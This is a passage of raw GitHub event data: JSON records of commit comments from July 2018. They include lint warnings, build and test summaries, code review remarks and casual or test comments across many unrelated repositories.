^~~~~~~~~\n```"}},"created_at":"2018-07-19T04:51:45Z"}
{"id":"7986851136","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"unitcurrency/EasyBitcoin-PHP"},"payload":{"comment":{"id":29759154,"position":null,"line":null,"path":null,"commit_id":"687d42fe238add88e2d89570525c2a07149d593d","created_at":"2018-07-19T04:52:31Z","updated_at":"2018-07-19T04:52:31Z","author_association":"NONE","body":"Do it in hope me."}},"created_at":"2018-07-19T04:52:31Z"}
{"id":"7986852273","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"unitcurrency/EasyBitcoin-PHP"},"payload":{"comment":{"id":29759155,"position":null,"line":null,"path":null,"commit_id":"687d42fe238add88e2d89570525c2a07149d593d","created_at":"2018-07-19T04:52:59Z","updated_at":"2018-07-19T04:52:59Z","author_association":"NONE","body":"Funning"}},"created_at":"2018-07-19T04:52:59Z"}
{"id":"7986852750","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"unitcurrency/EasyBitcoin-PHP"},"payload":{"comment":{"id":29759157,"position":null,"line":null,"path":null,"commit_id":"687d42fe238add88e2d89570525c2a07149d593d","created_at":"2018-07-19T04:53:11Z","updated_at":"2018-07-19T04:53:11Z","author_association":"NONE","body":"@unitcurrency "}},"created_at":"2018-07-19T04:53:11Z"}
{"id":"7986853550","type":"CommitCommentEvent","actor":{"login":"BlueDrink9"},"repo":{"name":"noisive/stoned-crone"},"payload":{"comment":{"id":29759159,"position":null,"line":null,"path":null,"commit_id":"21585a6214ff70147cd46051c91efdfbb0aeb56a","created_at":"2018-07-19T04:53:32Z","updated_at":"2018-07-19T04:53:32Z","author_association":"COLLABORATOR","body":"This fixes #79 "}},"created_at":"2018-07-19T04:53:32Z"}
{"id":"7986853555","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/physiology"},"payload":{"comment":{"id":29759160,"position":null,"line":null,"path":null,"commit_id":"834e17456f46dff6471a9a0d35a34cee5cbdcc87","created_at":"2018-07-19T04:53:32Z","updated_at":"2018-07-19T04:53:32Z","author_association":"NONE","body":"[R/bmi.R:14:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L14) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:15:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L15) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:83:7:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L83) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​      valid_height(height_m, ...)\n      ^~~~~~~~~~~~\n```\n[R/bmi.R:132:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L132) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:156:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L156) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:181:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L181) *warning:* **no visible global function definition for ‘valid_height’**\n```r\n​  valid_height(height_m, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:182:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L182) *warning:* **no visible global function definition for ‘valid_weight’**\n```r\n​  valid_weight(weight_kg, ...)\n  ^~~~~~~~~~~~\n```\n[R/bmi.R:204:15:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L204) *warning:* **no visible global function definition for ‘blood_vol_Lemmens_indexed’**\n```r\n​  weight_kg * blood_vol_Lemmens_indexed(height_m, weight_kg, ...)\n              ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:214:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L214) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:215:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L215) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:238:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L238) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:239:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L239) *warning:* **no visible global function definition for ‘valid_age_adult’**\n```r\n​  valid_age_adult(age_y, ...)\n  ^~~~~~~~~~~~~~~\n```\n[R/bmi.R:260:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L260) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:261:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L261) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:264:9:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L264) *warning:* **no visible global function definition for ‘ideal_weight_adult’**\n```r\n​  0.6 * ideal_weight_adult(height_m, male) + 0.4 * weight_kg\n        ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:280:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L280) *warning:* **no visible global function definition for ‘valid_height_adult’**\n```r\n​  valid_height_adult(height_m, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:281:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L281) *warning:* **no visible global function definition for ‘valid_weight_adult’**\n```r\n​  valid_weight_adult(weight_kg, ...)\n  ^~~~~~~~~~~~~~~~~~\n```\n[R/bmi.R:292:3:](https://github.com/jackwasey/physiology/blob/834e17456f46dff6471a9a0d35a34cee5cbdcc87/R/bmi.R#L292) *warning:* **no visible global function definition for ‘bmi_adult’**\n```r\n​  bmi_adult(heightin * 0.0254, weightlb / 2.2046224, ...)\n  ^~~~~~~~~\n```"}},"created_at":"2018-07-19T04:53:32Z"}
{"id":"7986854836","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"unitcurrency/EasyBitcoin-PHP"},"payload":{"comment":{"id":29759162,"position":null,"line":null,"path":null,"commit_id":"687d42fe238add88e2d89570525c2a07149d593d","created_at":"2018-07-19T04:54:02Z","updated_at":"2018-07-19T04:54:02Z","author_association":"NONE","body":"It's very easy to make some words bold and other words italic with Markdown. You can even link to Google!"}},"created_at":"2018-07-19T04:54:02Z"}
{"id":"7986867347","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29759179,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T04:59:17Z","updated_at":"2018-07-19T04:59:17Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-MacOS-10.9-clang: Tests Failed (1385 of 2948 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 1\n * Failed: 624\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-46.98%25-red.png)</a> \n"}},"created_at":"2018-07-19T04:59:17Z"}
{"id":"7986867586","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29759180,"position":null,"line":null,"path":null,"commit_id":"f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8","created_at":"2018-07-19T04:59:24Z","updated_at":"2018-07-19T04:59:24Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (RKStrand) - Win64-Windows-7-VisualStudio-14: OK (2940 of 2943 tests passed, 16 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 2 tests had: Table big diffs.\n * 5 tests had: ESO small diffs.\n * 3 tests had: MTR small diffs.\n * 2 tests had: Table small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 620\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3ee7e3e6bba23ec0340c64ac6c0ef0a622a93e8-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.9%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T04:59:24Z"}
{"id":"7986873666","type":"CommitCommentEvent","actor":{"login":"Manuel-777"},"repo":{"name":"Manuel-777/MTG-Arena-Tool"},"payload":{"comment":{"id":29759189,"position":null,"line":null,"path":null,"commit_id":"b84e3fb3fc41bf0750bfb042b8c3ac6d2609d229","created_at":"2018-07-19T05:01:36Z","updated_at":"2018-07-19T05:01:36Z","author_association":"OWNER","body":"This is a big one, I created a new \"window\" that is hidden and handles basically all logic from the tool. This allows me to do blocking logic on the background without halting the entire app.\r\n\r\nThis is a great performance upgraqde, in the sense the app will no longer show to be blocked or thinking, unless we decide to show that; you can interact with the app while it is doing something and you wont notice until the background process tells the other windows to show it. :D\r\n\r\nStill under testing, but its a good place to start!"}},"created_at":"2018-07-19T05:01:36Z"}
{"id":"7986879606","type":"CommitCommentEvent","actor":{"login":"waves1280"},"repo":{"name":"k-kapital/GekkoAlgs"},"payload":{"comment":{"id":29759197,"position":null,"line":null,"path":null,"commit_id":"9ec76306e37e89d2ee4bcede5f7c7055b64b221d","created_at":"2018-07-19T05:03:51Z","updated_at":"2018-07-19T05:03:51Z","author_association":"CONTRIBUTOR","body":"@tylerettner14 needs adjustments to TOML file. "}},"created_at":"2018-07-19T05:03:51Z"}
{"id":"7986880064","type":"CommitCommentEvent","actor":{"login":"xixixijie"},"repo":{"name":"xixixijie/SSM"},"payload":{"comment":{"id":29759200,"position":null,"line":null,"path":null,"commit_id":"45b87776c77c721c169cd6b81f26e4e06596e6d8","created_at":"2018-07-19T05:04:02Z","updated_at":"2018-07-19T05:04:02Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-19T05:04:02Z"}
{"id":"7986883732","type":"CommitCommentEvent","actor":{"login":"kapilghuman"},"repo":{"name":"kapilghuman/Technical-Vitality-Tracker"},"payload":{"comment":{"id":29759209,"position":30,"line":53,"path":"project/public/app/views/index.html","commit_id":"f3ac49edffcdda4d4207bf7ac7b6f64b255420ee","created_at":"2018-07-19T05:05:30Z","updated_at":"2018-07-19T05:05:30Z","author_association":"OWNER","body":"if you remove this ng-show=\"main.isLoggedIn then Log out button will display on  every page (including register page)"}},"created_at":"2018-07-19T05:05:30Z"}
{"id":"7986891287","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29759219,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T05:08:30Z","updated_at":"2018-07-19T05:08:30Z","author_association":"NONE","body":"Congratulations"}},"created_at":"2018-07-19T05:08:30Z"}
{"id":"7986891760","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29759220,"position":121,"line":153,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-19T05:08:43Z","updated_at":"2018-07-19T05:08:43Z","author_association":"NONE","body":"The only size that we don't know is the last level of vvv_planes, if that's what you mean. The rest is known, either because we limit the number of observations, or because we count the total number of observations."}},"created_at":"2018-07-19T05:08:43Z"}
{"id":"7986895273","type":"CommitCommentEvent","actor":{"login":"martinschroeder"},"repo":{"name":"amphp/byte-stream"},"payload":{"comment":{"id":29759224,"position":111,"line":209,"path":"lib/ResourceOutputStream.php","commit_id":"019cd6d27310417e6241d33962865f8fdb49d83c","created_at":"2018-07-19T05:10:09Z","updated_at":"2018-07-19T05:10:09Z","author_association":"NONE","body":"You can use `Deferred::transform()` instead which operates on a single `Awaitable` and avoids resolution of a `Deferred` by returning or throwing from the callback. You can avoid array creation, deferred resolution and the additional closure if you refactor like this:\r\n```php\r\nDeferred::transform($awaitable, [$this, 'close']);\r\n```"}},"created_at":"2018-07-19T05:10:09Z"}
{"id":"7986896038","type":"CommitCommentEvent","actor":{"login":"AspenJames"},"repo":{"name":"AspenJames/js-ajax-fetch-readme-v-000"},"payload":{"comment":{"id":29759225,"position":null,"line":null,"path":null,"commit_id":"7d2d5d0a9be274fb657ef64c05c4593925882daa","created_at":"2018-07-19T05:10:27Z","updated_at":"2018-07-19T05:10:27Z","author_association":"OWNER","body":"Comment posted via GitHub API!"}},"created_at":"2018-07-19T05:10:27Z"}
{"id":"7986899374","type":"CommitCommentEvent","actor":{"login":"Josia50"},"repo":{"name":"Josia50/LukeWelcomeBot"},"payload":{"comment":{"id":29759231,"position":null,"line":null,"path":null,"commit_id":"b62e9ef93738a49b802cb33a5e460f771da88d11","created_at":"2018-07-19T05:11:53Z","updated_at":"2018-07-19T05:11:53Z","author_association":"OWNER","body":"Commands Work"}},"created_at":"2018-07-19T05:11:53Z"}
{"id":"7986902495","type":"CommitCommentEvent","actor":{"login":"merskip"},"repo":{"name":"ShawnMoore/XMLParsing"},"payload":{"comment":{"id":29759237,"position":14,"line":14,"path":"XMLParsing/Decoder/XMLKeyedDecodingContainer.swift","commit_id":"528b06c519832cedf96c2ca813c0384ae9c7c11b","created_at":"2018-07-19T05:13:08Z","updated_at":"2018-07-19T05:13:08Z","author_association":"NONE","body":"Why not just `<Key : CodingKey>`?"}},"created_at":"2018-07-19T05:13:08Z"}
{"id":"7986910671","type":"CommitCommentEvent","actor":{"login":"winex"},"repo":{"name":"ldtteam/minecolonies"},"payload":{"comment":{"id":29759251,"position":null,"line":null,"path":null,"commit_id":"c024298b7b51d76155a70fcff1dd74770c658d51","created_at":"2018-07-19T05:16:30Z","updated_at":"2018-07-19T05:16:30Z","author_association":"CONTRIBUTOR","body":"well, after upping GT to level 5, my Knight got fast to level 8 and i now see him wearing Diamond Armor, which i put into warehouse today from the start... together with 3 sets x Iron Armor + 1x Leather, but no other Knights (level 4) nor Rangers are wearing those sets... :("}},"created_at":"2018-07-19T05:16:30Z"}
{"id":"7986911616","type":"CommitCommentEvent","actor":{"login":"shawnlinxl"},"repo":{"name":"shawnlinxl/opat"},"payload":{"comment":{"id":29759252,"position":null,"line":null,"path":null,"commit_id":"e3f98fad8430746b3db9a5895e1d11806ad6d55c","created_at":"2018-07-19T05:16:54Z","updated_at":"2018-07-19T05:16:54Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Write function to compute daily returns from holdings.](https://trello.com/c/PA3HDZYx/2-write-function-to-compute-daily-returns-from-holdings)"}},"created_at":"2018-07-19T05:16:54Z"}
{"id":"7986915021","type":"CommitCommentEvent","actor":{"login":"chopperg"},"repo":{"name":"chopperg/fantastic-octo-goggles"},"payload":{"comment":{"id":29759259,"position":655,"line":655,"path":"LICENSE","commit_id":"52653073b0ad2581e8b476762517d0c32a79f880","created_at":"2018-07-19T05:18:18Z","updated_at":"2018-07-19T05:18:18Z","author_association":"OWNER","body":"Help with donations plz"}},"created_at":"2018-07-19T05:18:18Z"}
{"id":"7986919557","type":"CommitCommentEvent","actor":{"login":"bolkedebruin"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":29759263,"position":4,"line":228,"path":"LICENSE","commit_id":"ec38ba9594395de04ec932481212a86fbe9ae107","created_at":"2018-07-19T05:19:54Z","updated_at":"2018-07-19T05:19:54Z","author_association":"CONTRIBUTOR","body":"@yrqls21 @Fokko as far as I can see we are not including ElasticMock in the distribution. Why was this added? Should it be removed? Only artifacts that we include with the source distribution need to be added"}},"created_at":"2018-07-19T05:19:54Z"}
{"id":"7986922502","type":"CommitCommentEvent","actor":{"login":"TuHuynhthanh"},"repo":{"name":"TuHuynhthanh/STM32"},"payload":{"comment":{"id":29759265,"position":null,"line":null,"path":null,"commit_id":"e82d540be63005f73378d4c8b90fc7a3f7aba2a0","created_at":"2018-07-19T05:20:55Z","updated_at":"2018-07-19T05:20:55Z","author_association":"OWNER","body":"viết code giao tiếp với module lora RA02 dùng stm32F1, code dùng HAL của ST sinh ra bằng CUBEMX"}},"created_at":"2018-07-19T05:20:55Z"}
{"id":"7986923817","type":"CommitCommentEvent","actor":{"login":"carolw21"},"repo":{"name":"carolw21/Parstagram"},"payload":{"comment":{"id":29759269,"position":68,"line":68,"path":"app/src/main/java/me/carolwang/parstagram/PostDetailsFragment.java","commit_id":"da8277bf44703cdc4e34cb82393338f2264b6573","created_at":"2018-07-19T05:21:19Z","updated_at":"2018-07-19T05:21:19Z","author_association":"OWNER","body":"Yes, it is an image loading library."}},"created_at":"2018-07-19T05:21:19Z"}
{"id":"7986923998","type":"CommitCommentEvent","actor":{"login":"bolkedebruin"},"repo":{"name":"apache/incubator-airflow"},"payload":{"comment":{"id":29759270,"position":4,"line":228,"path":"LICENSE","commit_id":"ec38ba9594395de04ec932481212a86fbe9ae107","created_at":"2018-07-19T05:21:22Z","updated_at":"2018-07-19T05:21:22Z","author_association":"CONTRIBUTOR","body":"Scrap that I see it."}},"created_at":"2018-07-19T05:21:22Z"}
{"id":"7986949844","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29759318,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T05:31:24Z","updated_at":"2018-07-19T05:31:24Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - i386-Windows-7-VisualStudio-14: OK (2947 of 2948 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 657\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T05:31:24Z"}
{"id":"7986956212","type":"CommitCommentEvent","actor":{"login":"Srichon"},"repo":{"name":"cyberpay/EasyBitcoin-PHP"},"payload":{"comment":{"id":29759325,"position":null,"line":null,"path":null,"commit_id":"5d7a7bb0d4c419e584a47ae09f3ebe0098bb45e7","created_at":"2018-07-19T05:33:56Z","updated_at":"2018-07-19T05:33:56Z","author_association":"NONE","body":"[](url)"}},"created_at":"2018-07-19T05:33:56Z"}
{"id":"7986962950","type":"CommitCommentEvent","actor":{"login":"bradharding"},"repo":{"name":"bradharding/doomretro"},"payload":{"comment":{"id":29759337,"position":null,"line":null,"path":null,"commit_id":"d9cebae42bd50237c09c00024c239f5befa3ff9c","created_at":"2018-07-19T05:36:29Z","updated_at":"2018-07-19T05:36:29Z","author_association":"OWNER","body":"It certainly was becoming a bit of a chore. I had a long list of things still to do with Heretic, but was finding I was going back more and more to work on the strictly-Doom code. Checking for Heretic every moment was making a mess of the code, and would require some complete rewrites of stuff. So it was either persevere and have code I'm not happy with to support a game I don't care for, or drop it."}},"created_at":"2018-07-19T05:36:29Z"}
{"id":"7986965416","type":"CommitCommentEvent","actor":{"login":"chopperg"},"repo":{"name":"chopperg/animated-computing-machine"},"payload":{"comment":{"id":29759339,"position":null,"line":null,"path":null,"commit_id":"acf2c4ac79f78a32307d559d366782a77eabc575","created_at":"2018-07-19T05:37:26Z","updated_at":"2018-07-19T05:37:26Z","author_association":"OWNER","body":"Donations \r\n"}},"created_at":"2018-07-19T05:37:26Z"}
{"id":"7986969382","type":"CommitCommentEvent","actor":{"login":"garyd203"},"repo":{"name":"MechanicalRock/serverless-sns-filter"},"payload":{"comment":{"id":29759343,"position":null,"line":null,"path":null,"commit_id":"6ca799f9cd4947e3c3eda8cb22fe73bf856623cd","created_at":"2018-07-19T05:38:54Z","updated_at":"2018-07-19T05:38:54Z","author_association":"CONTRIBUTOR","body":"Yeah, no, fair enough. I encountered the problem as an unknown topic inside `getTopicCloudformationResourceKey`, rather than a nonexistent function.\r\n\r\nI believe the underlying issue is that serverless has enhanced their object model to allow different eays of specifying SNS events, and I was using one of these new ways. So my `serverless.yaml` produced a valid event object, but it was structured in an unexpected way (the `sns` object was a dict with a `topicName` field, rather than a string containing the topic name). This meant `getTopicCloudformationResourceKey` was doing a lookup with an object rather than the actual topic name.\r\n\r\nI had actually done a second PR to address that, but I got stymied by the tests. It may not be perfect, but I'll push it anyway and we can continue the discussion over there :-)"}},"created_at":"2018-07-19T05:38:54Z"}
{"id":"7986971626","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29759345,"position":null,"line":null,"path":null,"commit_id":"951a5ef4ea3a5cc47f91c21cefe31ca158e292c4","created_at":"2018-07-19T05:39:44Z","updated_at":"2018-07-19T05:39:44Z","author_association":"CONTRIBUTOR","body":"I really don't know what was the problem?\r\n`cinnamon-control-center` compiles fine locally..."}},"created_at":"2018-07-19T05:39:44Z"}
{"id":"7986975700","type":"CommitCommentEvent","actor":{"login":"yonghyun123"},"repo":{"name":"yonghyun123/NetworkProgramming"},"payload":{"comment":{"id":29759352,"position":null,"line":null,"path":null,"commit_id":"745d5ab886534004d6ee5534626a96f69fa00d75","created_at":"2018-07-19T05:41:14Z","updated_at":"2018-07-19T05:41:14Z","author_association":"OWNER","body":"ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 직접해봐야쓰겄어\r\n"}},"created_at":"2018-07-19T05:41:14Z"}
{"id":"7986979802","type":"CommitCommentEvent","actor":{"login":"aeyakovenko"},"repo":{"name":"solana-labs/solana"},"payload":{"comment":{"id":29759355,"position":13,"line":1361,"path":"src/crdt.rs","commit_id":"7baf6c42393b8c31a954fbb42cedebfbfc9d781a","created_at":"2018-07-19T05:42:45Z","updated_at":"2018-07-19T05:42:45Z","author_association":"MEMBER","body":"while the name of this test make sense, its testing something different.  can you move the tests into `test_is_valid_address`"}},"created_at":"2018-07-19T05:42:45Z"}
{"id":"7986982260","type":"CommitCommentEvent","actor":{"login":"sophypal"},"repo":{"name":"ciena-frost/ember-frost-core"},"payload":{"comment":{"id":29759360,"position":6,"line":19,"path":"tests/index.html","commit_id":"03845abe279cfcfeaa94ca9fe4d9ae3e85e24a02","created_at":"2018-07-19T05:43:41Z","updated_at":"2018-07-19T05:43:41Z","author_association":"CONTRIBUTOR","body":"I had to do the same in other repos where sizing caused issue and firefox zoom behavior is non existent."}},"created_at":"2018-07-19T05:43:41Z"}
{"id":"7986983712","type":"CommitCommentEvent","actor":{"login":"AtosNicoS"},"repo":{"name":"asyncapi/asyncapi"},"payload":{"comment":{"id":29759364,"position":4,"line":4,"path":"schema/asyncapi.json","commit_id":"57dfc9566a110ddfae218d2732fc413189147066","created_at":"2018-07-19T05:44:13Z","updated_at":"2018-07-19T05:44:13Z","author_association":"NONE","body":"Isnt it time for draft 07 now?"}},"created_at":"2018-07-19T05:44:13Z"}
{"id":"7986984930","type":"CommitCommentEvent","actor":{"login":"raunakhajela"},"repo":{"name":"raunakhajela/rh-wp-plugin"},"payload":{"comment":{"id":29759366,"position":null,"line":null,"path":null,"commit_id":"30887a795a601b75120c9a9c915cde5a4632f6e2","created_at":"2018-07-19T05:44:40Z","updated_at":"2018-07-19T05:44:40Z","author_association":"OWNER","body":"To call our custom post type during initialization we are using the constructor to call our method 'custom_post_type'. \r\n\r\nactivate() method will generate our CPT when you activate our plugin."}},"created_at":"2018-07-19T05:44:40Z"}
{"id":"7986985318","type":"CommitCommentEvent","actor":{"login":"DanielXiao"},"repo":{"name":"vmware/vic"},"payload":{"comment":{"id":29759367,"position":40,"line":235,"path":".drone.yml","commit_id":"00d377d31739ac35e05964f6975569adf98ef12e","created_at":"2018-07-19T05:44:48Z","updated_at":"2018-07-19T05:44:48Z","author_association":"NONE","body":"Why don't we also create a master folder like release branches"}},"created_at":"2018-07-19T05:44:48Z"}
{"id":"7986988095","type":"CommitCommentEvent","actor":{"login":"AtosNicoS"},"repo":{"name":"asyncapi/asyncapi"},"payload":{"comment":{"id":29759377,"position":4,"line":4,"path":"schema/asyncapi.json","commit_id":"57dfc9566a110ddfae218d2732fc413189147066","created_at":"2018-07-19T05:45:48Z","updated_at":"2018-07-19T05:45:48Z","author_association":"NONE","body":"Oh and also if you release asyncapi 1.2.0 and 1.3.0 it could be a good idea to place all of them into this folder. This way one can link to them in your json schema to automatically validate the json."}},"created_at":"2018-07-19T05:45:48Z"}
{"id":"7986994541","type":"CommitCommentEvent","actor":{"login":"tollyx"},"repo":{"name":"tollyx/MOAS-LMS"},"payload":{"comment":{"id":29759390,"position":null,"line":null,"path":null,"commit_id":"dc15b1059f5934a2844a9d7a28148361ba73f546","created_at":"2018-07-19T05:48:09Z","updated_at":"2018-07-19T05:48:09Z","author_association":"OWNER","body":"Nja, kommer du ihåg hur vi gjorde det i någon version av garaget?Vi har en db tabell för Activitypes som har man samt fält för alla andra värden som vi kan tänkas behöva (t.ex. IsAssignment eller något bättre namn), sen så har Activity en referens till en activitytype.Sen så är det bara att seeda våra types och så borde det vara klart!Orsaken varför vi skulle vilja göra det så här är för att ifall vi vill ha nya typer så kan vi bara lägga till en ny typ i databasen.On 18 Jul 2018 16:34, hejamarcus <notifications@github.com> wrote:Ska ActivityType vara en sträng?\r\n\r\n—You are receiving this because you are subscribed to this thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-19T05:48:09Z"}
{"id":"7987003377","type":"CommitCommentEvent","actor":{"login":"martiuslim"},"repo":{"name":"solana-labs/solana"},"payload":{"comment":{"id":29759412,"position":13,"line":1361,"path":"src/crdt.rs","commit_id":"7baf6c42393b8c31a954fbb42cedebfbfc9d781a","created_at":"2018-07-19T05:51:12Z","updated_at":"2018-07-19T05:51:12Z","author_association":"NONE","body":"Sure! Is there any specific ordering in the tests currently or should I just put it at the end?"}},"created_at":"2018-07-19T05:51:12Z"}
{"id":"7987004592","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29759415,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T05:51:39Z","updated_at":"2018-07-19T05:51:39Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-19T05:51:39Z"}
{"id":"7987006204","type":"CommitCommentEvent","actor":{"login":"kirivaha"},"repo":{"name":"kirivaha/WP-test"},"payload":{"comment":{"id":29759418,"position":4,"line":27,"path":"index.php","commit_id":"f99df344e446dba47f690976b5828b43413729eb","created_at":"2018-07-19T05:52:12Z","updated_at":"2018-07-19T05:52:12Z","author_association":"OWNER","body":"восстановил\r\n"}},"created_at":"2018-07-19T05:52:12Z"}
